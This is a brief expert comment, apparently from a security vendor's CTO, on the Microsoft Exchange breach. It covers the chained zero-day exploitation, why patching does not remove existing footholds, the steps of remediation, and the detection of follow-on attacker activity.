Vectra AI CTO Oliver Tavakoli’s comment on Microsoft Exchange breach


Share

The hack involved the combined exploitation of multiple 0-day vulnerabilities, starting with an OWA SSRF vulnerability and then proceeding to the exploitation of other vulnerability to burrow deeper into the inner workings of the server.

Patching the Exchange servers will prevent an attack if their Exchange server has not already been compromised. But it will not undo the foothold attackers have on already compromised Exchange servers. Microsoft has published a technical blog on how to recognize signs that an Exchange Server is already compromised.

Remediation will not be simple — it will effectively require backing up data, re-imaging the Exchange server, scrubbing the backup of any accounts which should not be present, resetting all passwords and secrets, and restoring the remaining backup data.

Complex software which has been around for a long time (Exchange and OWA certainly qualify in this regard) will almost invariably contain flaws which given sufficient motivation, resources and skill will be discovered and exploited. The key to resilience in these cases is to have the capability to detect downstream activity necessary to capitalize on the foothold gained — the good news is that this activity (e.g. the use of a reverse shell, the abuse of PowerShell, etc.) almost always follows more standard tradecraft which can be detected by Network Detection and Response products.


Leave a reply